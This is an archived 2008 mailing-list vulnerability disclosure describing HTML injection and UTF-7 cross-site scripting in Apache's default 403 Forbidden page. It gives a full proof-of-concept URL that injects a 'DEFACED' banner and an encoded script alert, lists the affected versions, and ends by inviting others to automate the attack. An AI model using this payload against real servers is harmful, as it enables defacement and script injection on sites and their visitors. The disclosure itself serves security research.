OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Apache Server HTML Injection and UTF-7 XSS Vulnerability

From: lament hero (lament.herogmail.com)
Date: Thu May 08 2008 - 18:13:21 CDT


Apache Server HTML Injection and UTF-7 XSS Vulnerability

This vulnerability was found by Yaniv Miron and Yossi Yakubov.
This vulnerability will allow an attacker to inject an XSS to any
Apache server that use the Forbidden 403 default page.

After injecting this string:
http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--

You will get a Forbidden 403 error message with an XSS alert.
This string is combined from HTML Injection and a XSS string coded in UTF-7.

This is only a PoC and because of that the browser should be in auto
select mode of encoding so it could use the UTF-7 encoding.

This attack had been tested on some Apache versions as 2.2.x and 1.3.x
and on some versions of FireFox up to version 2.0.0.x and in IE 6 and
7.

We leave it to other hackers to upgrade the attack and make it fully automatic.

Yaniv Miron aka "Lament".